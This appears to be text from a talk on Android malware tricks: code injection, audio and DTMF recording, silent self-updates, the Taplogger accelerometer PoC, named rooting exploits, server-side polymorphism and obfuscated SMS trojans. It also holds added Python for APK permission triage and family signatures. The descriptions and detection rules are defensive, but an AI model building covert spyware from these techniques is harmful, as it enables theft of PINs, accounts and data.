./ir/sharif/iranianfoods/R$menu.smali
./ir/sharif/iranianfoods/ListItemAdapter.smali
./ir/sharif/iranianfoods/IranData.smali
./ir/sharif/iranianfoods/Touch$AddImgAdp.smali
./ir/sharif/iranianfoods/TabHostActivity.smali
./ir/sharif/iranianfoods/Constants.smali
14. Attacker Tricks - Injecting code
localBitmap1 = BitmapFactory.decodeResource(this$0.getResources(), 2130837505);
localBitmap2 = BitmapFactory.decodeFile(localFile2.getPath());
int m = localBitmap2.getWidth();
int n = localBitmap1.getWidth();
int i1 = m;
int i2 = n;
if (i1 > i2)
{
i3 = localBitmap2.getWidth();
i4 = localBitmap2.getHeight();
label122: Bitmap.Config localConfig = Bitmap.Config.ARGB_8888;
localBitmap3 = Bitmap.createBitmap(i3, i4, localConfig);
Canvas localCanvas = new Canvas(localBitmap3);
float f1 = 0.0F;
float f2 = 0.0F;
Paint localPaint1 = null;
localCanvas.drawBitmap(localBitmap2, f1, f2, localPaint1);
float f3 = 100.0F;
float f4 = 300.0F;
Paint localPaint2 = null;
localCanvas.drawBitmap(localBitmap1, f3, f4, localPaint2);
}
16. Attacker Tricks – Recording Audio
• Audio
– DTMF (“Touch Tones”)
– Telephone Calls
• Initially used in academic PoCs
– SoundComber
• DB of IVR Converted DTMF
• January 2011
• Very common in spyware
• Used in malware
17. Attacker Tricks – Recording Audio
• Android/Nickispy
– Records to AMR files
– August 2011
• Android/GoldenEagle
– Records to AMR files
– September 2011
• Audio recording benefits
– Trade secrets
– CC#
– PINs
18. Attacker Tricks - Malware Updates
• Malware authors are now including update functionality
– Keeping the profits rolling in and maintaining control of devices
– Initially just used by mobile botnet clients
• Generally only requires the permission INSTALL_PACKAGES
• android.permission.INSTALL_PACKAGES
• There are two main ways users are attacked
– Fake legitimate updates
• Ex: SYSTEM_PATCH, Android_4.0_patch
• Really just trojan horses
– Malware updating itself
• More functions
– Send sensitive user info
– Exfiltrate data
• New/patched payloads
– Exploits
19. Attacker Tricks - Malware Updates
• Real malware updates
– Because even the bad guys understand that sometimes you need to patch
• Usually not visual
– Don't inform the users/victims
– Don't depend on users to approve updates
20. Academic Research - Taplogger
• Taplogger
– Combination training and attack app
• Reads accelerometer for keypresses
• Training app is a fake icon matching game
– High score = trained it to steal your pin
• Two attacks
– Number pad logging
» PINs, CC#s, etc.
– Password stealing
» Screen unlock
– Previous research
• Touchlogger
– Two parts – training and logging
• ACCessory
– Detects full keyboard
22. Attacker Tricks - Rooting Exploits
• Rooting Android
– Good for improving security, but can leave you open to attack
– Replacing firmware
– Removing bloatware and security vulnerabilities
• Most attackers are not interested in developing their own exploits
– Function of slow patching on Android and the number of parties involved in releasing new firmware
• “too many chefs in the kitchen”
– Leads to the same three or four common exploits and minor modifications
Exploit               Detected as
PSneuter              Exploit/RetuenSP.A
Gingerbreak           Exploit/Voldbrk, 18 minor variants of the same exploit
Exploid               Exploit/Lvedu, 26 minor variants
RageAgainstTheCage    Exploit/Diutes, 5 minor variants
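A static triage pass over an unpacked APK that turns the update slides (18-19) and the rooting-exploit slide (22) into checks: risky permissions in the manifest (INSTALL_PACKAGES for self-update, plus the permissions behind the audio-recording and OneClickFraud tricks), ELF binaries shipped as raw resources or assets, and the fake "patch" app names the deck quotes. This is an added example, not McAfee's or the deck's code; the permission-to-trick mapping, the scoring weights and the sample manifest are my own constructions.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
ELF_MAGIC = b"\x7fELF"

# Permissions mapped to the tricks the deck describes (constructed mapping, not a vendor rule set).
RISKY_PERMS = {
    "android.permission.INSTALL_PACKAGES": "self-update / trojanised 'patch' (slides 18-19)",
    "android.permission.SEND_SMS": "premium-rate SMS sending",
    "android.permission.RECEIVE_SMS": "reading incoming SMS (cf. FakeToken's SmsReciver class)",
    "android.permission.RECORD_AUDIO": "call / DTMF recording (Nickispy, GoldenEagle)",
    "android.permission.GET_ACCOUNTS": "harvesting the Google account (OneClickFraud)",
    "android.permission.READ_PHONE_STATE": "IMEI and line number (OneClickFraud)",
}
# Names the slide quotes for fake "updates" that are really trojan horses.
FAKE_UPDATE_NAMES = ("system_patch", "android_4.0_patch")

def manifest_permissions(manifest_xml: str) -> List[str]:
    """All <uses-permission android:name=...> values from a decoded AndroidManifest.xml."""
    root = ET.fromstring(manifest_xml)
    return [e.get(ANDROID_NS + "name", "") for e in root.iter("uses-permission")]

def triage(app_label: str, manifest_xml: str, files: Dict[str, bytes]) -> Dict[str, object]:
    """Score an unpacked APK: risky permissions, bundled ELF binaries, fake-update naming."""
    perms = manifest_permissions(manifest_xml)
    flagged = {p: RISKY_PERMS[p] for p in perms if p in RISKY_PERMS}
    # Root exploits travel as raw resources/assets (slide 7 even decrypts them at runtime);
    # an ELF executable inside an ordinary app's resources deserves a close look.
    elf_blobs = [p for p, d in files.items()
                 if p.startswith(("res/raw/", "assets/")) and d[:4] == ELF_MAGIC]
    fake_update = app_label.lower() in FAKE_UPDATE_NAMES
    score = len(flagged) + 2 * len(elf_blobs) + (3 if fake_update else 0)
    return {"permissions": flagged, "elf_in_resources": elf_blobs,
            "fake_update_name": fake_update, "score": score}

# Constructed sample: a "kitchen timer" that wants far more than a timer needs.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.constructed.timer">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.GET_ACCOUNTS"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.INSTALL_PACKAGES"/>
</manifest>"""
SAMPLE_FILES = {
    "res/raw/exp": b"\x7fELF\x01\x01\x01" + b"\x00" * 9,  # constructed ELF header bytes
    "assets/readme.txt": b"kitchen timer",
}

if __name__ == "__main__":
    print(triage("Android_4.0_patch", SAMPLE_MANIFEST, SAMPLE_FILES))
```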
23. Attacker Tricks – Server-Side Polymorphism
• Server-side
– Uses larger resources server side vs. lower powered devices
– Modifying DEX files
• Manual changes
– Renaming source and recompiling
• Automated changes
– Easier than it sounds
– Scriptable text changes in source
24. Attacker Tricks – Server-Side Polymorphism
• One major family: Android/FakeInstaller
• Main generic signature
• Supplementary detections for 25 variants
• Changes
– By day
– By hour
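The slide's "main generic signature" versus "supplementary detections" split, shown as an added example (not McAfee's detection logic): a signature computed only from framework API calls is unchanged by the scripted class renames the previous slide describes, while a hash that includes attacker-chosen names breaks on every hourly rebuild and needs a supplementary entry. The three "builds" and their call lists are constructed stand-ins for decompiled DEX output, and the family name is a placeholder.

```python
import hashlib
import re
from typing import Dict, List

# Calls into the platform survive "rename the source and recompile"; attacker-chosen
# class and method names do not. Only the former feed the generic signature.
FRAMEWORK_RE = re.compile(r"^(android|java|javax|dalvik)\.")

def generic_signature(classes: Dict[str, List[str]]) -> str:
    """Hash of the sorted multiset of framework calls, ignoring class/method names."""
    calls = sorted(c for calls in classes.values() for c in calls if FRAMEWORK_RE.match(c))
    return hashlib.sha256("\n".join(calls).encode()).hexdigest()

def exact_signature(classes: Dict[str, List[str]]) -> str:
    """Hash that also covers the attacker-controlled names; changes on every rebuild."""
    lines = sorted(f"{name}:{c}" for name, calls in classes.items() for c in calls)
    return hashlib.sha256("\n".join(lines).encode()).hexdigest()

def classify(classes: Dict[str, List[str]], known: Dict[str, str]) -> str:
    """Map a sample to a family by generic signature; 'unknown' means a new payload
    (or a supplementary detection) is needed."""
    return known.get(generic_signature(classes), "unknown")

# Constructed variants of one SMS-sending family, as a server might emit them hour by hour.
MORNING_BUILD = {
    "token/bot/MainService": ["android.telephony.SmsManager.sendTextMessage",
                              "android.telephony.TelephonyManager.getDeviceId",
                              "java.net.HttpURLConnection.connect"],
    "token/bot/SmsReciver": ["android.content.BroadcastReceiver.abortBroadcast"],
}
AFTERNOON_BUILD = {  # same behaviour, scripted renames plus a new internal helper call
    "a/b/Svc": ["android.telephony.SmsManager.sendTextMessage",
                "java.net.HttpURLConnection.connect", "a/b/Svc.helper",
                "android.telephony.TelephonyManager.getDeviceId"],
    "a/b/Rcv": ["android.content.BroadcastReceiver.abortBroadcast"],
}
NEW_PAYLOAD = {**AFTERNOON_BUILD, "a/b/Rec": ["android.media.MediaRecorder.start"]}

KNOWN_FAMILIES = {generic_signature(MORNING_BUILD): "ConstructedFamily.A (placeholder)"}

if __name__ == "__main__":
    for name, build in [("morning", MORNING_BUILD), ("afternoon", AFTERNOON_BUILD),
                        ("new payload", NEW_PAYLOAD)]:
        print(name, classify(build, KNOWN_FAMILIES), exact_signature(build)[:12])
```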
A lot of SMS sending trojans use very simple encryption or obfuscation.
The top one hides the SMS number and message in a standard HTML file. It looks like the attacker possibly modified a standard Microsoft-provided HTML file. If you're not looking for it you'd miss it.
Others use very simple substitution ciphers. All of this just to make it less obvious what the SMS number and message are.
Of course, if you have the binary, these are easy to reverse.
More advanced malware uses better algorithms like DES. Geinimi uses DES to encrypt its C&C traffic and URL queries.
This is a research PoC. It's in two parts: a desktop application to identify keystrokes from accelerometer readings and, eventually, an app that uses the derived keystroke/touch database to identify individual numbers.
Future improvements include expanding from a custom keyboard to the default on-screen keyboard and identification of letters.
The attacker profits initially by identifying when numbers are entered. These can be CC#s, SS#s or PINs. Future work could capture passwords, account names and other sensitive data.
Botnets are pretty straightforward. They're basically client-server networks where the clients are infected machines. An attacker infects a large number of machines or devices and then controls them through their command and control server.
Command and control can vary from a simple single server to a network of redundant servers.
Botnets are good for performing attacks against targets (DDoS, phishing, etc.) and for gathering information: personally identifiable information, financial records and other confidential information.
Depending on how complex they are, the botnet clients may also utilize features of rootkits.